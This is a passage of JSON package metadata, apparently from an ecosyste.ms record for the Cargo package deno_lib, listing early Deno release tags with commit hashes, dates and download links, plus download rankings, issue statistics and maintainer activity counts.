Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:24:46.119Z","dependent_packages_count":0,"downloads":58625,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.7596418936946,"dependent_repos_count":24.440162452198145,"dependent_packages_count":32.41514244211899,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.87164892933725},"purl":"pkg:cargo/deno_lib","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_lib","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_lib","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_lib/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/G